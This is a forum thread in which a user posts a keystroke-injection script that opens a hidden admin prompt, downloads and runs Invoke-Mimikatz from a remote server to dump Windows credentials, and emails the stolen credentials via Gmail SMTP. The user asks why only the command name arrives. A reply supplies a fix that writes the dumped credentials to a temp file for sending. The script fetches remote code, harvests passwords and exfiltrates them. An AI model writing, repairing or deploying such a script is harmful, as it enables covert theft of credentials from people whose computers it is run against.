Jump to content

A question about scripting


Eno12345

Recommended Posts

I am trying to add a twist on the 15 second password stealer i robot hack in which it emails the credentials instead of uploading them to a server. This is my code. I changed the email addresses and passwords for security.

DELAY 3000
REM Open an admin command prompt 
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 1000
REM Obfuscate the command prompt
STRING mode con:cols=18 lines=1
ENTER
STRING color FE
ENTER
REM Download and execute Invoke Mimikatz then upload the results
STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://darren.kitchen/im.ps1');$output = Invoke-Mimikatz -DumpCreds; $output > log.txt;"
ENTER
DELAY 1500
STRING powershell
ENTER
STRING $SMTPServer = 'smtp.gmail.com'
ENTER
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
STRING $SMTPInfo.EnableSsl = $true
ENTER
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('MyEmail1@gmail.com', 'MyPassword')
ENTER
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
STRING $ReportEmail.From = 'MyEmail1@gmail.com'
ENTER
STRING $ReportEmail.To.Add('MyEmail2@gmail.com')
ENTER
STRING $ReportEmail.Subject = 'PassDump'
ENTER
STRING $ReportEmail.Body = (Get-Content Log.txt | out-string)
ENTER
STRING $SMTPInfo.Send($ReportEmail)
ENTER
DELAY 2000
STRING exit
ENTER
DELAY 500
REM Clear the Run history and exit
ENTER
STRING exit
ENTER

and in my email in-box all i got was a email that said the words "

Quote

Invoke-Mimikatz
-DumpCreds

How do I get it so it actually sends the output of Invoke-Mmikats instead of literally sending the words Invoke-Mimikatz. Thanks in advance.

Link to comment
Share on other sites

Use something like:

Invoke-Mimikatz -DumpCreds|Out-File '%tmp%\%computername%_creds.txt';

this writes the output of Invoke-Mimikatz to your temp folder in a file name yourpcname_creds.txt which you can then read and or even send as a email attachment if you want.

ps: the invoke mimikatz script isn't hosted on darrens webserver - use your own host.

Edited by ThoughtfulDev
Fixed Typo
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...